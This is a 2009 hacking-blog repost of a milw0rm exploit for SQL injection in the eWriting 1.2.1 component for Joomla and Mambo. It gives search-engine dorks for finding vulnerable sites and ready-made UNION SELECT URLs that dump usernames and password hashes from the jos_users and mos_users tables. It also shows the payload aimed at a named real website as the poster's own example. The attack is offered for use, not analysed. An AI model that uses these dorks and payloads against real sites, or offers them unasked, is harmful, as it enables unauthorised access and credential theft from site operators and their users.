Joomla and Mambo eWriting 1.2.1 Components

Thursday, February 12, 2009

Joomla and Mambo eWriting 1.2.1 Components - SQL injection

5:34 PM

secure your world

eWriting 1.2.1 - SQL injection

# Discovered by breaker_unit & Don
# BHack
# b4lc4n.org
# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l

Dorks:

"Powered by eWriting 1.2.1
allinurl:"com_ewriting"

Joomla!

/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--

Mambo

/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--

+++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-03-10]

==============================================================
EXAMPLE FROM ME :

http://sexxxploration.com/cms/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--

VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Posted in: Bugs,Hacking

Thursday, February 12, 2009

Joomla and Mambo eWriting 1.2.1 Components - SQL injection

0 komentar:

Post a Comment

Featured Video

Categories

Blog Archive

Download

About Me

trafic

Followers